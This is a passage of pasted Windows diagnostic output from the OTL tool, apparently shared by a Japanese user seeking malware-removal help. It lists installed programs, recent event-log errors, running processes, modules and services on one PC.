"{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis
"{57383270-6F61-4DC8-A9B8-C1745FC29F38}" = USB PC Camera (SN9C102)
"{5982DE66-98C4-4351-AADB-61EC2CAE0B94}" = LightCapture
"{5A02FE73-5313-4467-8282-4974B6E333D4}" = MyBookEditor4
"{5AF4B3C4-C393-48D7-AC7E-8E7615579548}" = Adobe AIR
"{60E90BFF-5BE4-4DA9-9094-EC2C9AE6238E}" = モンスターハンター フロンティアG
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{6D1221A9-17BF-4EC0-81F2-27D30EC30701}" = Skype Click to Call
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{78002155-F025-4070-85B3-7C0453561701}" = Apple Application Support
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{78CE66A9-85AF-4BD8-8FB7-35B5F3846C00}" = Update for Japanese Microsoft IME Standard Extended Dictionary
"{7DB71278-9AD7-4480-AB08-8649C5010B17}" = Update for Japanese Microsoft IME Standard Dictionary
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{933B4015-4618-4716-A828-5289FC03165F}" = VC80CRTRedist - 8.0.50727.6195
"{95716cce-fc71-413f-8ad5-56c2892d4b3a}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610
"{9864624D-FE15-422F-BDBB-5DC0D9AA904A}" = Gamepot Web実行環境
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9D646264-E17E-4E82-A7DF-CA59A9F10648}" = TuneUp Utilities Language Pack (ja-JP)
"{a1909659-0a08-4554-8af1-2175904903a1}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610
"{A6057B4B-F75B-418A-8A26-C9F27859A150}" = 幻想神域
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1041-7B44-AB0000000001}" = Adobe Reader XI (11.0.10) - Japanese
"{BF606435-86FF-43D3-97CB-65F6C6B9ACFA}" = ニコ生デスクトップキャプチャー(XP) SEASON2
"{E3D1594B-8077-42C9-8541-B8438F52F283}" = Niconico Live Encoder
"{E3F7F270-4ADD-3DA6-8B35-A924C134D49F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"{E7D4E834-93EB-351F-B8FB-82CDAE623003}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{F59AC46C-10C3-4023-882C-4212A92283B3}_is1" = Lagarith Lossless Codec (1.3.27)
"{F63BF3C0-D774-11D5-9241-444553540000}" = eo接続ツール
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel(R) SDK for OpenCL - CPU Only Runtime Package
"Adobe AIR" = Adobe AIR
"Adobe Flash Player NPAPI" = Adobe Flash Player 17 NPAPI
"Age of Empires 2.0" = Microsoft Age of Empires II
"Age of Empires II: The Conquerors Expansion 1.0" = Microsoft Age of Empires II: The Conquerors Expansion
"AmaRecTV Live" = AmaRecTV Live
"AmvVideoCodec" = AmvVideoCodec
"ApplicationManager" = ApplicationManager 2011.4.27.209
"ArcheAge" = ArcheAge
"au Wi-Fi接続ツール" = au Wi-Fi接続ツール
"chorokuf" = ♪超録 - パソコン長時間録音機 フリーウェア版
"DAEMON Tools Lite" = DAEMON Tools Lite
"DC-Bass Source" = DC-Bass Source 1.3.0
"DivX Setup" = DivXセットアップ
"ffdshow_is1" = ffdshow v1.1.4399 [2012-03-22]
"Google Chrome" = Google Chrome
"herdProtectScan" = herdProtect Anti-Malware Scanner
"iFunbox_is1" = iFunbox (v2.94.2520.758), iFunbox DevTeam
"InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}" = VIA プラットフォーム･デバイス･マネージャ
"klive" = KDrive
"kliveaddin" = KDriveプラグイン
"LAME_is1" = LAME v3.99.3 (for Windows)
"Lhaplus" = Lhaplus
"LimeChat 2" = LimeChat 2
"LINE" = LINE
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware バージョン 1.75.0.1300
"Mozilla Firefox 37.0.1 (x86 ja)" = Mozilla Firefox 37.0.1 (x86 ja)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"OpenSource Flash Video Splitter" = OpenSource Flash Video Splitter 1.0.0.5
"Pmang" = Pmangインストールマネージャー
"Pmang_archeage" = ArcheAge
"Pmang_common" = Common
"Pmang_tera" = TERA
"Project 64_is1" = Project 64 version 2.1.0.1
"RPGVXAce_RTP_is1" = RPGツクールVX Ace RTP
"SoundEngine Free" = SoundEngine Free
"Steam" = Steam
"Steam App 221380" = Age of Empires II: HD Edition
"SysInfo" = Creative システム インフォメーション
"TalesWeaver" = TalesWeaver
"vsfilter_is1" = DirectVobSub 2.40.4209
"つよきす３学期" = つよきす３学期

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Hangame.com" = Hangame
"NeoplePlugin" = NeoplePlugin
"OneDriveSetup.exe" = Microsoft OneDrive
"俺たちに翼はないＲ" = 俺たちに翼はないＲ

[color=#E56717]========== Last 20 Event Log Errors ==========[/color]

[ Application Events ]
Error - 2015/04/18 5:56:35 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 6:41:59 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 6:51:23 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 8:19:12 | Computer Name = nametuki | Source = ESENT | ID = 215
Description = WinMail (2392) WindowsMail0: クライアントがインスタンスを中止したか、またはクライアントとの接続に失敗したため、バックアップを停止しました。

Error - 2015/04/19 8:46:26 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/19 18:45:13 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/19 22:13:43 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/20 9:03:50 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0x8bc 障害が発生しているアプリケーションの開始時刻: 0x01d07b6a564bcd0f
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: afc9e3a0-e75d-11e4-bf32-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

Error - 2015/04/20 9:10:52 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0xf34 障害が発生しているアプリケーションの開始時刻: 0x01d07b6b352d2fe2
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: ab411f5c-e75e-11e4-bf33-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

Error - 2015/04/20 10:46:19 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0xf34 障害が発生しているアプリケーションの開始時刻: 0x01d07b6b352d2fe2
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: 010357d5-e76c-11e4-bf33-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

[ System Events ]
Error - 2015/04/20 12:45:25 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:47:02 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:47:12 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = Service Control Manager | ID = 7001
Description = Network Location Awareness サービスは、次のエラーが原因で開始できなかった DHCP Client サービスに依存しています:
%%1068

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = Service Control Manager | ID = 7001
Description = Network List Service サービスは、次のエラーが原因で開始できなかった Network Location Awareness
サービスに依存しています: %%1068

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:54:23 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =


< End of report >

続いてFirefoxリフレッシュ後のOTLログです。

OTL logfile created on: 2015/04/21 20:07:45 - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 3.44 Gb Available Physical Memory | 43.68% Memory free
9.13 Gb Paging File | 3.87 Gb Available in Paging File | 42.35% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.38 Gb Free Space | 7.74% Space Free | Partition Type: NTFS
Drive F: | 105.28 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
PRC - [2015/02/10 23:04:06 | 002,357,248 | ---- | M] (i-Funbox.com) -- C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
PRC - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/08/07 14:01:56 | 003,970,920 | ---- | M] (LINE Corporation) -- C:\Program Files (x86)\Naver\LINE\Line.exe
PRC - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2014/04/24 09:33:15 | 000,841,032 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
PRC - [2013/11/15 09:48:30 | 001,861,968 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2011/08/30 11:37:00 | 000,860,608 | ---- | M] (Kingsoft Corp. Ltd.) -- C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
PRC - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2014/08/07 14:01:50 | 002,108,264 | ---- | M] () -- C:\Program Files (x86)\Naver\LINE\amp_window.dll
MOD - [2014/07/23 17:33:26 | 000,113,664 | ---- | M] () -- C:\Program Files (x86)\Naver\LINE\PlayerHelper.dll
MOD - [2014/04/24 09:33:13 | 000,390,472 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\ppgooglenaclpluginchrome.dll
MOD - [2014/04/24 09:33:12 | 013,692,232 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\PepperFlash\pepflashplayer.dll
MOD - [2014/04/24 09:33:10 | 004,081,480 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\pdf.dll
MOD - [2014/04/24 09:33:05 | 000,674,632 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\libglesv2.dll
MOD - [2014/04/24 09:33:04 | 000,093,000 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\libegl.dll
MOD - [2014/04/24 09:33:03 | 001,647,432 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\ffmpegsumo.dll
MOD - [2014/04/24 09:33:01 | 000,065,352 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\chrome_elf.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/02/12 20:58:10 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/02/12 20:58:10 | 000,237,384 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
MOD - [2013/11/15 09:49:56 | 000,100,688 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2013/11/15 09:48:30 | 001,861,968 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
MOD - [2011/09/25 14:40:20 | 000,084,480 | ---- | M] () -- C:\Program Files (x86)\Consolas\NDC(XP)\DesktopCaptureXP.ax


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/02/21 08:49:18 | 000,780,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,366,520 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2014/10/31 13:51:25 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/10/29 12:59:51 | 003,460,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:[b]64bit:[/b] - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:03 | 000,041,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2014/10/29 11:34:51 | 000,067,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2014/10/29 11:33:55 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:29:22 | 000,121,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:57:05 | 000,324,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:48:20 | 000,166,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:21 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:21 | 000,838,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:02 | 000,294,912 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:37 | 000,131,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:20:03 | 000,262,656 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:17 | 000,154,112 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:24 | 000,374,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:02 | 000,260,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:36 | 000,407,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:22 | 000,270,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2014/10/29 10:11:10 | 001,639,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:09:48 | 000,521,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:05:09 | 000,206,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:57:18 | 000,074,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2014/10/29 09:48:52 | 000,562,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2014/10/29 09:46:48 | 001,348,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:35:51 | 001,668,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2014/10/01 19:54:24 | 000,319,376 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\igfxCUIService.exe -- (igfxCUIService1.0.0.0)
SRV:[b]64bit:[/b] - [2012/08/14 18:03:42 | 000,027,792 | ---- | M] (VIA Technologies, Inc.) [Auto | Running] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:[b]64bit:[/b] - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2015/04/15 01:48:07 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/03 14:37:50 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/10/29 10:51:55 | 000,017,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2014/10/29 10:04:45 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2014/10/29 09:53:11 | 000,367,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/10/01 19:54:28 | 000,281,488 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2014/08/14 07:30:50 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/03/04 10:10:14 | 000,122,464 | ---- | M] (株式会社ネットビジョン) [On_Demand | Stopped] -- C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe -- (auWifiConnectSvc)
SRV - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
